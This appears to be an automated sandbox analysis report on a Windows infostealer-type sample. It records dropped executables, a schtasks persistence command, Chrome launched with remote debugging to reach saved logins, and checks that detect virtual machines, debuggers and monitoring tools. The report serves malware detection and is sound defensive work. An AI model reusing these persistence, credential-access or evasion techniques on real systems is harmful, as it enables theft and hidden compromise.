Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9F98F0	15_2_6C9F98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA07A20	15_2_6CA07A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0DBEE	15_2_6CA0DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0140E	15_2_6CA0140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA11510	15_2_6CA11510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0F610	15_2_6CA0F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9EF760	15_2_6C9EF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9D70C0	15_2_6C9D70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA850D0	15_2_6CA850D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9C3000	15_2_6C9C3000

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA93560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA95980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA95A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA93820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA936E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA8ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6CA93B20 appears 38 times

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 1200

Source: SwJD3kiOwV.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: SwJD3kiOwV.exe

Static PE information: Section: wpxibirw ZLIB complexity 0.9940545475547341

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/7@16/5

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

File created: C:\Users\user\AppData\Local\zBgetxaCVe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\uwwcACVDotPKkwKQKpzK
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5408
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

File created: C:\Users\user~1\AppData\Local\Temp\service123.exe

Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO logins (origin_url, action_url, username_element, username_value, password_element, password_value, submit_element, signon_realm, date_created, blacklisted_by_user, scheme, password_type, times_used, form_data, display_name, icon_url, federation_url, skip_zero_click, generation_upload_status, possible_username_pairs, id, date_last_used, moving_blocked_for, date_password_modified, sender_email, sender_name, date_received, sharing_notification_displayed, keychain_identifier) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)wq;
Source: chrome.exe, 0000000A.00000002.1717785821.000077D402965000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));

Source: SwJD3kiOwV.exe	Virustotal: Detection: 50%
Source: SwJD3kiOwV.exe	ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\SwJD3kiOwV.exe "C:\Users\user\Desktop\SwJD3kiOwV.exe"
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2328,i,18314253057255408516,4611028150433437333,262144 /prefetch:8
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 1200
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user~1\AppData\Local\Temp\/service123.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2328,i,18314253057255408516,4611028150433437333,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: ehoypkfwhvokjmbqaexv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: ehoypkfwhvokjmbqaexv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: ehoypkfwhvokjmbqaexv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: ehoypkfwhvokjmbqaexv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: ehoypkfwhvokjmbqaexv.dll	Jump to behavior

Source: SwJD3kiOwV.exe

Static file information: File size 4453376 > 1048576

Source: SwJD3kiOwV.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: SwJD3kiOwV.exe	Static PE information: Raw size of wpxibirw is bigger than: 0x100000 < 0x1b7a00

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 15_2_001C8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

15_2_001C8230

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: SwJD3kiOwV.exe

Static PE information: real checksum: 0x4437e7 should be: 0x44cdd7

Source: SwJD3kiOwV.exe	Static PE information: section name:
Source: SwJD3kiOwV.exe	Static PE information: section name: .idata
Source: SwJD3kiOwV.exe	Static PE information: section name:
Source: SwJD3kiOwV.exe	Static PE information: section name: wpxibirw
Source: SwJD3kiOwV.exe	Static PE information: section name: jehzlfbx
Source: SwJD3kiOwV.exe	Static PE information: section name: .taggant
Source: service123.exe.2.dr	Static PE information: section name: .eh_fram
Source: ehoYPkfWhVokJMBQaExv.dll.2.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001CA521 push es; iretd	15_2_001CA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA70C30 push eax; mov dword ptr [esp], edi	15_2_6CA70DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA3ED10 push eax; mov dword ptr [esp], ebx	15_2_6CA3EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA14E31 push eax; mov dword ptr [esp], ebx	15_2_6CA14E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA08E7A push edx; mov dword ptr [esp], ebx	15_2_6CA08E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0A947 push eax; mov dword ptr [esp], ebx	15_2_6CA0A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA28AA0 push eax; mov dword ptr [esp], ebx	15_2_6CA2909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA10AA2 push eax; mov dword ptr [esp], ebx	15_2_6CA10AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA12AAC push edx; mov dword ptr [esp], ebx	15_2_6CA12AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA3EAB0 push eax; mov dword ptr [esp], ebx	15_2_6CA3EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA42BF0 push eax; mov dword ptr [esp], ebx	15_2_6CA42F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA42BF0 push edx; mov dword ptr [esp], ebx	15_2_6CA42F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0048B push eax; mov dword ptr [esp], ebx	15_2_6CA004A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA004E0 push eax; mov dword ptr [esp], ebx	15_2_6CA006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA08435 push edx; mov dword ptr [esp], ebx	15_2_6CA08449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA28460 push eax; mov dword ptr [esp], ebx	15_2_6CA28A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0A5A7 push eax; mov dword ptr [esp], ebx	15_2_6CA0A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9E1CFA push eax; mov dword ptr [esp], ebx	15_2_6CA96622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9E1CFA push eax; mov dword ptr [esp], ebx	15_2_6CA96622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA186A1 push 890005EAh; ret	15_2_6CA186A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA006A2 push eax; mov dword ptr [esp], ebx	15_2_6CA006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA006A6 push eax; mov dword ptr [esp], ebx	15_2_6CA006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA506B0 push eax; mov dword ptr [esp], ebx	15_2_6CA50A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA066F3 push edx; mov dword ptr [esp], ebx	15_2_6CA06707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA006FD push eax; mov dword ptr [esp], ebx	15_2_6CA006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA42620 push eax; mov dword ptr [esp], ebx	15_2_6CA42954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA42620 push edx; mov dword ptr [esp], ebx	15_2_6CA42973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0070E push eax; mov dword ptr [esp], ebx	15_2_6CA006DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6CA0A777 push eax; mov dword ptr [esp], ebx	15_2_6CA0A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9DE0D0 push eax; mov dword ptr [esp], ebx	15_2_6CA96AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_6C9DE0D0 push edx; mov dword ptr [esp], edi	15_2_6CA96B36

Source: SwJD3kiOwV.exe

Static PE information: section name: wpxibirw entropy: 7.9553234103456045

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File created: C:\Users\user\AppData\Local\Temp\ehoYPkfWhVokJMBQaExv.dll			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window searched: window name: Regmonclass	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user~1\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_15-158332

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_15-158333

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
